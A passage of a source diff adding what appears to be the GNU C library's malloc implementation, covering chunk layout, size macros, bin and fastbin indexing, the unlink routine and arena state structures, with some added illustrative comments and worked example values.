+    Wilson ftp://ftp.cs.utexas.edu/pub/garbage/allocsrv.ps for a
+    survey of such techniques.)  Sizes of free chunks are stored both
+    in the front of each chunk and at the end.  This makes
+    consolidating fragmented chunks into bigger chunks very fast.  The
+    size fields also hold bits representing whether chunks are free or
+    in use.
+
+    An allocated chunk looks like this:
+
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of chunk, in bytes                     |A|M|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             User data starts here...                          .
+	    .                                                               .
+	    .             (malloc_usable_size() bytes)                      .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             (size of chunk, but used for application data)    |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|1|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    Where "chunk" is the front of the chunk for the purpose of most of
+    the malloc code, but "mem" is the pointer that is returned to the
+    user.  "Nextchunk" is the beginning of the next contiguous chunk.
+
+    Chunks always begin on even word boundaries, so the mem portion
+    (which is returned to the user) is also on an even word boundary, and
+    thus at least double-word aligned.
+
+    Free chunks are stored in circular doubly-linked lists, and look like this:
+
+    chunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of previous chunk, if unallocated (P clear)  |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `head:' |             Size of chunk, in bytes                     |A|0|P|
+      mem-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Forward pointer to next chunk in list             |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Back pointer to previous chunk in list            |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Unused space (may be 0 bytes long)                .
+	    .                                                               .
+	    .                                                               |
+nextchunk-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+    `foot:' |             Size of chunk, in bytes                           |
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+	    |             Size of next chunk, in bytes                |A|0|0|
+	    +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
+
+    The P (PREV_INUSE) bit, stored in the unused low-order bit of the
+    chunk size (which is always a multiple of two words), is an in-use
+    bit for the *previous* chunk.  If that bit is *clear*, then the
+    word before the current chunk size contains the previous chunk
+    size, and can be used to find the front of the previous chunk.
+    The very first chunk allocated always has this bit set,
+    preventing access to non-existent (or non-owned) memory. If
+    prev_inuse is set for any given chunk, then you CANNOT determine
+    the size of the previous chunk, and might even get a memory
+    addressing fault when trying to do so.
+
+    The A (NON_MAIN_ARENA) bit is cleared for chunks on the initial,
+    main arena, described by the main_arena variable.  When additional
+    threads are spawned, each thread receives its own arena (up to a
+    configurable limit, after which arenas are reused for multiple
+    threads), and the chunks in these arenas have the A bit set.  To
+    find the arena for a chunk on such a non-main arena, heap_for_ptr
+    performs a bit mask operation and indirection through the ar_ptr
+    member of the per-heap header heap_info (see arena.c).
+
+    Note that the `foot' of the current chunk is actually represented
+    as the prev_size of the NEXT chunk. This makes it easier to
+    deal with alignments etc but can be very confusing when trying
+    to extend or adapt this code.
+
+    The three exceptions to all this are:
+
+     1. The special chunk `top' doesn't bother using the
+	trailing size field since there is no next contiguous chunk
+	that would have to index off it. After initialization, `top'
+	is forced to always exist.  If it would become less than
+	MINSIZE bytes long, it is replenished.
+
+     2. Chunks allocated via mmap, which have the second-lowest-order
+	bit M (IS_MMAPPED) set in their size fields.  Because they are
+	allocated one-by-one, each must contain its own trailing size
+	field.  If the M bit is set, the other bits are ignored
+	(because mmapped chunks are neither in an arena, nor adjacent
+	to a freed chunk).  The M bit is also used for chunks which
+	originally came from a dumped heap via malloc_set_state in
+	hooks.c.
+
+     3. Chunks in fastbins are treated as allocated chunks from the
+	point of view of the chunk allocator.  They are consolidated
+	with their neighbors only in bulk, in malloc_consolidate.
+*/
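+
+/*
+  Illustrative sketch (not part of this file; assumes a 64-bit system where
+  SIZE_SZ is 8, per the layout above): the size field of a chunk sits
+  immediately before the pointer returned to the user, with the A, M and P
+  flags in its low three bits.  For inspection only; it relies on allocator
+  internals.
+
+    #include <stdio.h>
+    #include <stdlib.h>
+
+    int main (void)
+    {
+      void *mem = malloc (24);
+      size_t sz = *((size_t *) mem - 1);    // mchunk_size of this chunk
+      printf ("chunk size 0x%zx  A=%zu M=%zu P=%zu\n",
+              sz & ~(size_t) 0x7,
+              (sz >> 2) & 1, (sz >> 1) & 1, sz & 1);
+      free (mem);
+      return 0;
+    }
+*/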
+
+/*
+  ---------- Size and alignment checks and conversions ----------
+*/
+
+/* conversion from malloc headers to user pointers, and back */
+
+#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
+#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))
+
+/* The smallest possible chunk */
+#define MIN_CHUNK_SIZE        (offsetof(struct malloc_chunk, fd_nextsize))
+
+/* The smallest size we can malloc is an aligned minimal chunk */
+
+#define MINSIZE  \
+  (unsigned long)(((MIN_CHUNK_SIZE+MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK))
+
+/* Check if m has acceptable alignment */
+
+#define aligned_OK(m)  (((unsigned long)(m) & MALLOC_ALIGN_MASK) == 0)
+
+#define misaligned_chunk(p) \
+  ((uintptr_t)(MALLOC_ALIGNMENT == 2 * SIZE_SZ ? (p) : chunk2mem (p)) \
+   & MALLOC_ALIGN_MASK)
+
+/* pad request bytes into a usable size -- internal version */
+
+#define request2size(req)                                         \
+  (((req) + SIZE_SZ + MALLOC_ALIGN_MASK < MINSIZE)  ?             \
+   MINSIZE :                                                      \
+   ((req) + SIZE_SZ + MALLOC_ALIGN_MASK) & ~MALLOC_ALIGN_MASK)
+
+/* Check if REQ overflows when padded and aligned and if the resulting value
+   is less than PTRDIFF_MAX.  On success, returns TRUE and stores the padded
+   size (or MINSIZE, if the padded value is smaller than MINSIZE) in *SZ;
+   returns FALSE if any of these checks fail.  */
+static inline bool
+checked_request2size (size_t req, size_t *sz) __nonnull (1)
+{
+  if (__glibc_unlikely (req > PTRDIFF_MAX))
+    return false;
+  *sz = request2size (req);
+  return true;
+}
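+
+/*
+  Illustrative values (assuming SIZE_SZ == 8 and MALLOC_ALIGNMENT == 16,
+  the usual 64-bit configuration; not part of this file):
+
+    request2size (0)   == 32   (MINSIZE)
+    request2size (24)  == 32   (24 + SIZE_SZ fits in a 32-byte chunk)
+    request2size (25)  == 48   (25 + SIZE_SZ rounds up to the next 16)
+    request2size (100) == 112
+
+  and checked_request2size (SIZE_MAX, &sz) returns false because the
+  request exceeds PTRDIFF_MAX.
+*/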
+
+/*
+   --------------- Physical chunk operations ---------------
+ */
+
+
+/* size field is or'ed with PREV_INUSE when previous adjacent chunk in use */
+#define PREV_INUSE 0x1
+
+/* extract inuse bit of previous chunk */
+#define prev_inuse(p)       ((p)->mchunk_size & PREV_INUSE)
+
+
+/* size field is or'ed with IS_MMAPPED if the chunk was obtained with mmap() */
+#define IS_MMAPPED 0x2
+
+/* check for mmap()'ed chunk */
+#define chunk_is_mmapped(p) ((p)->mchunk_size & IS_MMAPPED)
+
+
+/* size field is or'ed with NON_MAIN_ARENA if the chunk was obtained
+   from a non-main arena.  This is only set immediately before handing
+   the chunk to the user, if necessary.  */
+#define NON_MAIN_ARENA 0x4
+
+/* Check for chunk from main arena.  */
+#define chunk_main_arena(p) (((p)->mchunk_size & NON_MAIN_ARENA) == 0)
+
+/* Mark a chunk as not being on the main arena.  */
+#define set_non_main_arena(p) ((p)->mchunk_size |= NON_MAIN_ARENA)
+
+
+/*
+   Bits to mask off when extracting size
+
+   Note: IS_MMAPPED is intentionally not masked off from size field in
+   macros for which mmapped chunks should never be seen. This should
+   cause helpful core dumps to occur if it is tried by accident by
+   people extending or adapting this malloc.
+ */
+#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)
+
+/* Get size, ignoring use bits */
+#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
+
+/* Like chunksize, but do not mask SIZE_BITS.  */
+#define chunksize_nomask(p)         ((p)->mchunk_size)
+
+/* Ptr to next physical malloc_chunk. */
+#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
+
+/* Size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define prev_size(p) ((p)->mchunk_prev_size)
+
+/* Set the size of the chunk below P.  Only valid if !prev_inuse (P).  */
+#define set_prev_size(p, sz) ((p)->mchunk_prev_size = (sz))
+
+/* Ptr to previous physical malloc_chunk.  Only valid if !prev_inuse (P).  */
+#define prev_chunk(p) ((mchunkptr) (((char *) (p)) - prev_size (p)))
+
+/* Treat space at ptr + offset as a chunk */
+#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))
+
+/* extract p's inuse bit */
+#define inuse(p)							      \
+  ((((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size) & PREV_INUSE)
+
+/* set/clear chunk as being inuse without otherwise disturbing */
+#define set_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size |= PREV_INUSE
+
+#define clear_inuse(p)							      \
+  ((mchunkptr) (((char *) (p)) + chunksize (p)))->mchunk_size &= ~(PREV_INUSE)
+
+
+/* check/set/clear inuse bits in known places */
+#define inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size & PREV_INUSE)
+
+#define set_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size |= PREV_INUSE)
+
+#define clear_inuse_bit_at_offset(p, s)					      \
+  (((mchunkptr) (((char *) (p)) + (s)))->mchunk_size &= ~(PREV_INUSE))
+
+
+/* Set size at head, without disturbing its use bit */
+#define set_head_size(p, s)  ((p)->mchunk_size = (((p)->mchunk_size & SIZE_BITS) | (s)))
+
+/* Set size/use field */
+#define set_head(p, s)       ((p)->mchunk_size = (s))
+
+/* Set size at footer (only when chunk is not in use) */
+#define set_foot(p, s)       (((mchunkptr) ((char *) (p) + (s)))->mchunk_prev_size = (s))
+
+
+#pragma GCC poison mchunk_size
+#pragma GCC poison mchunk_prev_size
+
+/*
+   -------------------- Internal data structures --------------------
+
+   All internal state is held in an instance of malloc_state defined
+   below. There are no other static variables, except in two optional
+   cases:
+ * If USE_MALLOC_LOCK is defined, the mALLOC_MUTEx declared above.
+ * If mmap doesn't support MAP_ANONYMOUS, a dummy file descriptor
+     for mmap.
+
+   Beware of lots of tricks that minimize the total bookkeeping space
+   requirements. The result is a little over 1K bytes (for 4-byte
+   pointers and size_t).
+ */
+
+/*
+   Bins
+
+    An array of bin headers for free chunks. Each bin is doubly
+    linked.  The bins are approximately proportionally (log) spaced.
+    There are a lot of these bins (128). This may look excessive, but
+    works very well in practice.  Most bins hold sizes that are
+    unusual as malloc request sizes, but are more usual for fragments
+    and consolidated sets of chunks, which is what these bins hold, so
+    they can be found quickly.  All procedures maintain the invariant
+    that no consolidated chunk physically borders another one, so each
+    chunk in a list is known to be preceded and followed by either
+    inuse chunks or the ends of memory.
+
+    Chunks in bins are kept in size order, with ties going to the
+    approximately least recently used chunk. Ordering isn't needed
+    for the small bins, which all contain the same-sized chunks, but
+    facilitates best-fit allocation for larger chunks. These lists
+    are just sequential. Keeping them in order almost never requires
+    enough traversal to warrant using fancier ordered data
+    structures.
+
+    Chunks of the same size are linked with the most
+    recently freed at the front, and allocations are taken from the
+    back.  This results in LRU (FIFO) allocation order, which tends
+    to give each chunk an equal opportunity to be consolidated with
+    adjacent freed chunks, resulting in larger free chunks and less
+    fragmentation.
+
+    To simplify use in double-linked lists, each bin header acts
+    as a malloc_chunk. This avoids special-casing for headers.
+    But to conserve space and improve locality, we allocate
+    only the fd/bk pointers of bins, and then use repositioning tricks
+    to treat these as the fields of a malloc_chunk*.
+ */
+
+typedef struct malloc_chunk *mbinptr;
+
+/* addressing -- note that bin_at(0) does not exist */
+#define bin_at(m, i) \
+  (mbinptr) (((char *) &((m)->bins[((i) - 1) * 2]))			      \
+             - offsetof (struct malloc_chunk, fd))
+
+/* analog of ++bin */
+#define next_bin(b)  ((mbinptr) ((char *) (b) + (sizeof (mchunkptr) << 1)))
+
+/* Reminders about list directionality within bins */
+#define first(b)     ((b)->fd)
+#define last(b)      ((b)->bk)
+
+/*
+   Indexing
+
+    Bins for sizes < 512 bytes contain chunks of all the same size, spaced
+    8 bytes apart. Larger bins are approximately logarithmically spaced:
+
+    64 bins of size       8
+    32 bins of size      64
+    16 bins of size     512
+     8 bins of size    4096
+     4 bins of size   32768
+     2 bins of size  262144
+     1 bin  of size what's left
+
+    There is actually a little bit of slop in the numbers in bin_index
+    for the sake of speed. This makes no difference elsewhere.
+
+    The bins top out around 1MB because we expect to service large
+    requests via mmap.
+
+    Bin 0 does not exist.  Bin 1 is the unordered list; if that would be
+    a valid chunk size the small bins are bumped up one.
+ */
+
+#define NBINS             128
+#define NSMALLBINS         64
+#define SMALLBIN_WIDTH    MALLOC_ALIGNMENT
+#define SMALLBIN_CORRECTION (MALLOC_ALIGNMENT > 2 * SIZE_SZ)
+#define MIN_LARGE_SIZE    ((NSMALLBINS - SMALLBIN_CORRECTION) * SMALLBIN_WIDTH)
+
+#define in_smallbin_range(sz)  \
+  ((unsigned long) (sz) < (unsigned long) MIN_LARGE_SIZE)
+
+#define smallbin_index(sz) \
+  ((SMALLBIN_WIDTH == 16 ? (((unsigned) (sz)) >> 4) : (((unsigned) (sz)) >> 3))\
+   + SMALLBIN_CORRECTION)
+
+#define largebin_index_32(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 38) ?  56 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index_32_big(sz)                                            \
+  (((((unsigned long) (sz)) >> 6) <= 45) ?  49 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+// XXX It remains to be seen whether it is good to keep the widths of
+// XXX the buckets the same or whether it should be scaled by a factor
+// XXX of two as well.
+#define largebin_index_64(sz)                                                \
+  (((((unsigned long) (sz)) >> 6) <= 48) ?  48 + (((unsigned long) (sz)) >> 6) :\
+   ((((unsigned long) (sz)) >> 9) <= 20) ?  91 + (((unsigned long) (sz)) >> 9) :\
+   ((((unsigned long) (sz)) >> 12) <= 10) ? 110 + (((unsigned long) (sz)) >> 12) :\
+   ((((unsigned long) (sz)) >> 15) <= 4) ? 119 + (((unsigned long) (sz)) >> 15) :\
+   ((((unsigned long) (sz)) >> 18) <= 2) ? 124 + (((unsigned long) (sz)) >> 18) :\
+   126)
+
+#define largebin_index(sz) \
+  (SIZE_SZ == 8 ? largebin_index_64 (sz)                                     \
+   : MALLOC_ALIGNMENT == 16 ? largebin_index_32_big (sz)                     \
+   : largebin_index_32 (sz))
+
+#define bin_index(sz) \
+  ((in_smallbin_range (sz)) ? smallbin_index (sz) : largebin_index (sz))
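+
+/*
+  Illustrative index values (assuming SIZE_SZ == 8, so SMALLBIN_WIDTH is 16
+  and MIN_LARGE_SIZE is 1024; not part of this file):
+
+    bin_index (0x20)  == 2    small bin holding 0x20-byte chunks
+    bin_index (0x90)  == 9    small bin holding 0x90-byte chunks
+    bin_index (0x400) == 64   first large bin (0x400 is no longer "small")
+    bin_index (0x500) == 68   large bin spanning a 64-byte-wide size range
+*/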
+
+/* Take a chunk off a bin list.  */
+static void
+unlink_chunk (mstate av, mchunkptr p)
+{
+  if (chunksize (p) != prev_size (next_chunk (p)))
+    malloc_printerr ("corrupted size vs. prev_size");
+
+  mchunkptr fd = p->fd;
+  mchunkptr bk = p->bk;
+
+  if (__builtin_expect (fd->bk != p || bk->fd != p, 0))
+    malloc_printerr ("corrupted double-linked list");
+
+  fd->bk = bk;
+  bk->fd = fd;
+  if (!in_smallbin_range (chunksize_nomask (p)) && p->fd_nextsize != NULL)
+    {
+      if (p->fd_nextsize->bk_nextsize != p
+	  || p->bk_nextsize->fd_nextsize != p)
+	malloc_printerr ("corrupted double-linked list (not small)");
+
+      if (fd->fd_nextsize == NULL)
+	{
+	  if (p->fd_nextsize == p)
+	    fd->fd_nextsize = fd->bk_nextsize = fd;
+	  else
+	    {
+	      fd->fd_nextsize = p->fd_nextsize;
+	      fd->bk_nextsize = p->bk_nextsize;
+	      p->fd_nextsize->bk_nextsize = fd;
+	      p->bk_nextsize->fd_nextsize = fd;
+	    }
+	}
+      else
+	{
+	  p->fd_nextsize->bk_nextsize = p->bk_nextsize;
+	  p->bk_nextsize->fd_nextsize = p->fd_nextsize;
+	}
+    }
+}
+
+/*
+   Unsorted chunks
+
+    All remainders from chunk splits, as well as all returned chunks,
+    are first placed in the "unsorted" bin. They are then placed
+    in regular bins after malloc gives them ONE chance to be used before
+    binning. So, basically, the unsorted_chunks list acts as a queue,
+    with chunks being placed on it in free (and malloc_consolidate),
+    and taken off (to be either used or placed in bins) in malloc.
+
+    The NON_MAIN_ARENA flag is never set for unsorted chunks, so it
+    does not have to be taken into account in size comparisons.
+ */
+
+/* The otherwise unindexable 1-bin is used to hold unsorted chunks. */
+#define unsorted_chunks(M)          (bin_at (M, 1))
+
+/*
+   Top
+
+    The top-most available chunk (i.e., the one bordering the end of
+    available memory) is treated specially. It is never included in
+    any bin, is used only if no other chunk is available, and is
+    released back to the system if it is very large (see
+    M_TRIM_THRESHOLD).  Because top initially
+    points to its own bin with initial zero size, thus forcing
+    extension on the first malloc request, we avoid having any special
+    code in malloc to check whether it even exists yet. But we still
+    need to do so when getting memory from system, so we make
+    initial_top treat the bin as a legal but unusable chunk during the
+    interval between initialization and the first call to
+    sysmalloc. (This is somewhat delicate, since it relies on
+    the 2 preceding words to be zero during this interval as well.)
+ */
+
+/* Conveniently, the unsorted bin can be used as dummy top on first call */
+#define initial_top(M)              (unsorted_chunks (M))
+
+/*
+   Binmap
+
+    To help compensate for the large number of bins, a one-level index
+    structure is used for bin-by-bin searching.  `binmap' is a
+    bitvector recording whether bins are definitely empty so they can
+    be skipped over during traversals.  The bits are NOT always
+    cleared as soon as bins are empty, but instead only
+    when they are noticed to be empty during traversal in malloc.
+ */
+
+/* Conservatively use 32 bits per map word, even if on 64bit system */
+#define BINMAPSHIFT      5
+#define BITSPERMAP       (1U << BINMAPSHIFT)
+#define BINMAPSIZE       (NBINS / BITSPERMAP)
+
+#define idx2block(i)     ((i) >> BINMAPSHIFT)
+#define idx2bit(i)       ((1U << ((i) & ((1U << BINMAPSHIFT) - 1))))
+
+#define mark_bin(m, i)    ((m)->binmap[idx2block (i)] |= idx2bit (i))
+#define unmark_bin(m, i)  ((m)->binmap[idx2block (i)] &= ~(idx2bit (i)))
+#define get_binmap(m, i)  ((m)->binmap[idx2block (i)] & idx2bit (i))
+
+/*
+   Fastbins
+
+    An array of lists holding recently freed small chunks.  Fastbins
+    are not doubly linked.  It is faster to single-link them, and
+    since chunks are never removed from the middles of these lists,
+    double linking is not necessary. Also, unlike regular bins, they
+    are not even processed in FIFO order (they use faster LIFO) since
+    ordering doesn't much matter in the transient contexts in which
+    fastbins are normally used.
+
+    Chunks in fastbins keep their inuse bit set, so they cannot
+    be consolidated with other free chunks. malloc_consolidate
+    releases all chunks in fastbins and consolidates them with
+    other free chunks.
+ */
+
+typedef struct malloc_chunk *mfastbinptr;
+#define fastbin(ar_ptr, idx) ((ar_ptr)->fastbinsY[idx])
+
+/* offset 2 to use otherwise unindexable first 2 bins */
+#define fastbin_index(sz) \
+  ((((unsigned int) (sz)) >> (SIZE_SZ == 8 ? 4 : 3)) - 2)
+
+
+/* The maximum fastbin request size we support */
+#define MAX_FAST_SIZE     (80 * SIZE_SZ / 4)
+
+#define NFASTBINS  (fastbin_index (request2size (MAX_FAST_SIZE)) + 1)
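+
+/*
+  Illustrative index values (assuming SIZE_SZ == 8; not part of this file):
+  fastbin_index maps chunk sizes 0x20, 0x30, ... to indices 0, 1, ...
+
+    fastbin_index (0x20) == 0
+    fastbin_index (0x30) == 1
+    fastbin_index (0xb0) == 9
+
+  MAX_FAST_SIZE is 160 and request2size (160) is 0xb0, so NFASTBINS is 10;
+  with the default MXFAST only the first seven fastbins (up to 0x80-byte
+  chunks) are actually used.
+*/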
+
+/*
+   FASTBIN_CONSOLIDATION_THRESHOLD is the size of a chunk in free()
+   that triggers automatic consolidation of possibly-surrounding
+   fastbin chunks. This is a heuristic, so the exact value should not
+   matter too much. It is defined at half the default trim threshold as a
+   compromise heuristic to only attempt consolidation if it is likely
+   to lead to trimming. However, it is not dynamically tunable, since
+   consolidation reduces fragmentation surrounding large chunks even
+   if trimming is not used.
+ */
+
+#define FASTBIN_CONSOLIDATION_THRESHOLD  (65536UL)
+
+/*
+   NONCONTIGUOUS_BIT indicates that MORECORE does not return contiguous
+   regions.  Otherwise, contiguity is exploited in merging together,
+   when possible, results from consecutive MORECORE calls.
+
+   The initial value comes from MORECORE_CONTIGUOUS, but is
+   changed dynamically if mmap is ever used as an sbrk substitute.
+ */
+
+#define NONCONTIGUOUS_BIT     (2U)
+
+#define contiguous(M)          (((M)->flags & NONCONTIGUOUS_BIT) == 0)
+#define noncontiguous(M)       (((M)->flags & NONCONTIGUOUS_BIT) != 0)
+#define set_noncontiguous(M)   ((M)->flags |= NONCONTIGUOUS_BIT)
+#define set_contiguous(M)      ((M)->flags &= ~NONCONTIGUOUS_BIT)
+
+/* Maximum size of memory handled in fastbins.  */
+static INTERNAL_SIZE_T global_max_fast;
+
+/*
+   Set value of max_fast.
+   Use impossibly small value if 0.
+   Precondition: there are no existing fastbin chunks in the main arena.
+   Since do_check_malloc_state () checks this, we call malloc_consolidate ()
+   before changing max_fast.  Note other arenas will leak their fast bin
+   entries if max_fast is reduced.
+ */
+
+#define set_max_fast(s) \
+  global_max_fast = (((s) == 0)						      \
+                     ? SMALLBIN_WIDTH : ((s + SIZE_SZ) & ~MALLOC_ALIGN_MASK))
+
+static inline INTERNAL_SIZE_T
+get_max_fast (void)
+{
+  /* Tell the GCC optimizers that global_max_fast is never larger
+     than MAX_FAST_SIZE.  This avoids out-of-bounds array accesses in
+     _int_malloc after constant propagation of the size parameter.
+     (The code never executes because malloc preserves the
+     global_max_fast invariant, but the optimizers may not recognize
+     this.)  */
+  if (global_max_fast > MAX_FAST_SIZE)
+    __builtin_unreachable ();
+  return global_max_fast;
+}
+
+/*
+   ----------- Internal state representation and initialization -----------
+ */
+
+/*
+   have_fastchunks indicates that there are probably some fastbin chunks.
+   It is set true on entering a chunk into any fastbin, and cleared early in
+   malloc_consolidate.  The value is approximate since it may be set when there
+   are no fastbin chunks, or it may be clear even if there are fastbin chunks
+   available.  Given its sole purpose is to reduce the number of redundant calls to
+   malloc_consolidate, it does not affect correctness.  As a result we can safely
+   use relaxed atomic accesses.
+ */
+
+
+struct malloc_state
+{
+  /* Serialize access.  */
+  __libc_lock_define (, mutex);
+
+  /* Flags (formerly in max_fast).  */
+  int flags;
+
+  /* Set if the fastbin chunks contain recently inserted free blocks.  */
+  /* Note this is a bool but not all targets support atomics on booleans.  */
+  int have_fastchunks;
+
+  /* Fastbins */
+  mfastbinptr fastbinsY[NFASTBINS];
+
+  /* Base of the topmost chunk -- not otherwise kept in a bin */
+  mchunkptr top;
+
+  /* The remainder from the most recent split of a small request */
+  mchunkptr last_remainder;
+
+  /* Normal bins packed as described above */
+  mchunkptr bins[NBINS * 2 - 2];
+
+  /* Bitmap of bins */
+  unsigned int binmap[BINMAPSIZE];
+
+  /* Linked list */
+  struct malloc_state *next;
+
+  /* Linked list for free arenas.  Access to this field is serialized
+     by free_list_lock in arena.c.  */
+  struct malloc_state *next_free;
+
+  /* Number of threads attached to this arena.  0 if the arena is on
+     the free list.  Access to this field is serialized by
+     free_list_lock in arena.c.  */
+  INTERNAL_SIZE_T attached_threads;
+
+  /* Memory allocated from the system in this arena.  */
+  INTERNAL_SIZE_T system_mem;
+  INTERNAL_SIZE_T max_system_mem;
+};
+
+struct malloc_par
+{
+  /* Tunable parameters */
+  unsigned long trim_threshold;
+  INTERNAL_SIZE_T top_pad;
+  INTERNAL_SIZE_T mmap_threshold;
+  INTERNAL_SIZE_T arena_test;
+  INTERNAL_SIZE_T arena_max;
+
+  /* Memory map support */
+  int n_mmaps;
+  int n_mmaps_max;
+  int max_n_mmaps;
+  /* the mmap_threshold is dynamic, until the user sets
+     it manually, at which point we need to disable any
+     dynamic behavior. */
+  int no_dyn_threshold;
+
+  /* Statistics */
+  INTERNAL_SIZE_T mmapped_mem;
+  INTERNAL_SIZE_T max_mmapped_mem;
+
+  /* First address handed out by MORECORE/sbrk.  */
+  char *sbrk_base;
+
+#if USE_TCACHE
+  /* Maximum number of buckets to use.  */
+  size_t tcache_bins;
+  size_t tcache_max_bytes;
+  /* Maximum number of chunks in each bucket.  */
+  size_t tcache_count;
+  /* Maximum number of chunks to remove from the unsorted list, which
+     aren't used to prefill the cache.  */
+  size_t tcache_unsorted_limit;
+#endif
+};
+
+/* There are several instances of this struct ("arenas") in this
+   malloc.  If you are adapting this malloc in a way that does NOT use
+   a static or mmapped malloc_state, you MUST explicitly zero-fill it
+   before using. This malloc relies on the property that malloc_state
+   is initialized to all zeroes (as is true of C statics).  */
+
+static struct malloc_state main_arena =
+{
+  .mutex = _LIBC_LOCK_INITIALIZER,
+  .next = &main_arena,
+  .attached_threads = 1
+};
+
+/* These variables are used for undumping support.  Chunks are marked
+   as using mmap, but we leave them alone if they fall into this
+   range.  NB: The chunk size for these chunks only includes the
+   initial size field (of SIZE_SZ bytes), there is no trailing size
+   field (unlike with regular mmapped chunks).  */
+static mchunkptr dumped_main_arena_start; /* Inclusive.  */
+static mchunkptr dumped_main_arena_end;   /* Exclusive.  */
+
+/* True if the pointer falls into the dumped arena.  Use this after
+   chunk_is_mmapped indicates a chunk is mmapped.  */
+#define DUMPED_MAIN_ARENA_CHUNK(p) \
+  ((p) >= dumped_main_arena_start && (p) < dumped_main_arena_end)
+
+/* There is only one instance of the malloc parameters.  */
+
+static struct malloc_par mp_ =
+{
+  .top_pad = DEFAULT_TOP_PAD,
+  .n_mmaps_max = DEFAULT_MMAP_MAX,
+  .mmap_threshold = DEFAULT_MMAP_THRESHOLD,
+  .trim_threshold = DEFAULT_TRIM_THRESHOLD,
+#define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))
+  .arena_test = NARENAS_FROM_NCORES (1)
+#if USE_TCACHE
+  ,
+  .tcache_count = TCACHE_FILL_COUNT,
+  .tcache_bins = TCACHE_MAX_BINS,
+  .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),
+  .tcache_unsorted_limit = 0 /* No limit.  */
+#endif
+};
+
+/*
+   Initialize a malloc_state struct.
+
+   This is called from ptmalloc_init () or from _int_new_arena ()
+   when creating a new arena.
+ */
+
+static void
+malloc_init_state (mstate av)
+{
+  int i;
+  mbinptr bin;
+
+  /* Establish circular links for normal bins */
+  for (i = 1; i < NBINS; ++i)
+    {
+      bin = bin_at (av, i);
+      bin->fd = bin->bk = bin;
+    }
+
+#if MORECORE_CONTIGUOUS
+  if (av != &main_arena)
+#endif
+  set_noncontiguous (av);
+  if (av == &main_arena)
+    set_max_fast (DEFAULT_MXFAST);
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  av->top = initial_top (av);
+}
+
+/*
+   Other internal utilities operating on mstates
+ */
+
+static void *sysmalloc (INTERNAL_SIZE_T, mstate);
+static int      systrim (size_t, mstate);
+static void     malloc_consolidate (mstate);
+
+
+/* -------------- Early definitions for debugging hooks ---------------- */
+
+/* Define and initialize the hook variables.  These weak definitions must
+   appear before any use of the variables in a function (arena.c uses one).  */
+#ifndef weak_variable
+/* In GNU libc we want the hook variables to be weak definitions to
